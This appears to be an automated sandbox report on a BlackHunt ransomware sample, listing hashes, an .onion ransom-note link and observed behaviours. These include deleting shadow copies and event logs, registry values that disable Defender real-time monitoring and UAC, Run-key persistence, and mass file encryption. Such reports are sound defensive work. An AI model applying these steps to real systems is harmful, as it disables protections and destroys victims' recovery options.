Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 22:24
Static task
static1
Behavioral task
behavioral1
Sample
063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe
Resource
win10v2004-20231215-en
General
-
Target
063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe
-
Size
707KB
-
MD5
270b64f87b25e6d75386bfaa1a354ef1
-
SHA1
28decb2e4e385beebbff26d73ab49208717c7543
-
SHA256
063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce
-
SHA512
f38cf2d1a4998a3b4d991e29f5ab50241611085c263c51a7f02463c15cc70fdc15e9828317e2d73176279e5c793b646d215ef950d4531bcf1eaf464cbdeb2014
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza158Uvnh:6uaTmkZJ+naie5OTamgEoKxLWcqh
Malware Config
Extracted
C:\MSOCache\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2708 fsutil.exe 2764 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2740 wevtutil.exe 2344 wevtutil.exe 304 wevtutil.exe 1540 wevtutil.exe 3368 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1904 bcdedit.exe 772 bcdedit.exe 2184 bcdedit.exe 3116 bcdedit.exe -
Renames multiple (2878) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2888 wbadmin.exe 2832 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2516 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\U: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\J: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\N: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\M: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\H: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\L: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Z: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\R: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\A: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\S: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\K: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\I: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\P: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\Y: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\V: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\E: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\G: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\T: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\O: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\B: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\Q: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\W: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Accra 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_videoinset.png 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\skins\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montreal 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport_PAL.wmv 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-1 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_ButtonGraphic.png 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh88 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\PassportMask.wmv 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\locale\it\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_SelectionSubpicture.png 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Catamarca 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-compat.xml_hidden 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1664 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2952 vssadmin.exe 1624 vssadmin.exe 2468 vssadmin.exe 2916 vssadmin.exe 3232 vssadmin.exe 1440 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3196 taskkill.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3152 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3456 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeRestorePrivilege 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeBackupPrivilege 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeTakeOwnershipPrivilege 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeAuditPrivilege 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeSecurityPrivilege 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeIncBasePriorityPrivilege 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeBackupPrivilege 680 vssvc.exe Token: SeRestorePrivilege 680 vssvc.exe Token: SeAuditPrivilege 680 vssvc.exe Token: SeBackupPrivilege 2256 wbengine.exe Token: SeRestorePrivilege 2256 wbengine.exe Token: SeSecurityPrivilege 2256 wbengine.exe Token: SeSecurityPrivilege 3368 wevtutil.exe Token: SeBackupPrivilege 3368 wevtutil.exe Token: SeSecurityPrivilege 304 wevtutil.exe Token: SeBackupPrivilege 304 wevtutil.exe Token: SeSecurityPrivilege 2344 wevtutil.exe Token: SeSecurityPrivilege 2740 wevtutil.exe Token: SeSecurityPrivilege 1540 wevtutil.exe Token: SeBackupPrivilege 2344 wevtutil.exe Token: SeBackupPrivilege 2740 wevtutil.exe Token: SeBackupPrivilege 1540 wevtutil.exe Token: SeDebugPrivilege 3196 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2296 wrote to memory of 2700 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 155 PID 2296 wrote to memory of 2700 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 155 PID 2296 wrote to memory of 2700 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 155 PID 2296 wrote to memory of 2700 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 155 PID 2296 wrote to memory of 2484 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 153 PID 2296 wrote to memory of 2484 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 153 PID 2296 wrote to memory of 2484 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 153 PID 2296 wrote to memory of 2484 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 153 PID 2296 wrote to memory of 2876 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 151 PID 2296 wrote to memory of 2876 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 151 PID 2296 wrote to memory of 2876 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 151 PID 2296 wrote to memory of 2876 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 151 PID 2700 wrote to memory of 2880 2700 cmd.exe 150 PID 2700 wrote to memory of 2880 2700 cmd.exe 150 PID 2700 wrote to memory of 2880 2700 cmd.exe 150 PID 2296 wrote to memory of 2900 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 149 PID 2296 wrote to memory of 2900 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 149 PID 2296 wrote to memory of 2900 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 149 PID 2296 wrote to memory of 2900 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 149 PID 2484 wrote to memory of 2888 2484 cmd.exe 148 PID 2484 wrote to memory of 2888 2484 cmd.exe 148 PID 2484 wrote to memory of 2888 2484 cmd.exe 148 PID 2296 wrote to memory of 2760 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 146 PID 2296 wrote to memory of 2760 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 146 PID 2296 wrote to memory of 2760 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 146 PID 2296 wrote to memory of 2760 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 146 PID 2296 wrote to memory of 2404 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 143 PID 2296 wrote to memory of 2404 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 143 PID 2296 wrote to memory of 2404 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 143 PID 2296 wrote to memory of 2404 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 143 PID 2296 wrote to memory of 2644 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 141 PID 2296 wrote to memory of 2644 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 141 PID 2296 wrote to memory of 2644 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 141 PID 2296 wrote to memory of 2644 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 141 PID 2296 wrote to memory of 2816 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 140 PID 2296 wrote to memory of 2816 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 140 PID 2296 wrote to memory of 2816 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 140 PID 2296 wrote to memory of 2816 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 140 PID 2760 wrote to memory of 2632 2760 cmd.exe 138 PID 2760 wrote to memory of 2632 2760 cmd.exe 138 PID 2760 wrote to memory of 2632 2760 cmd.exe 138 PID 2296 wrote to memory of 2812 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 137 PID 2296 wrote to memory of 2812 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 137 PID 2296 wrote to memory of 2812 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 137 PID 2296 wrote to memory of 2812 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 137 PID 2296 wrote to memory of 2780 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 135 PID 2296 wrote to memory of 2780 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 135 PID 2296 wrote to memory of 2780 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 135 PID 2296 wrote to memory of 2780 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 135 PID 2900 wrote to memory of 2776 2900 cmd.exe 134 PID 2900 wrote to memory of 2776 2900 cmd.exe 134 PID 2900 wrote to memory of 2776 2900 cmd.exe 134 PID 2296 wrote to memory of 2892 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 133 PID 2296 wrote to memory of 2892 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 133 PID 2296 wrote to memory of 2892 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 133 PID 2296 wrote to memory of 2892 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 133 PID 2296 wrote to memory of 2672 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 132 PID 2296 wrote to memory of 2672 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 132 PID 2296 wrote to memory of 2672 2296 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 132 PID 2296 wrote to memory of 2672 2296 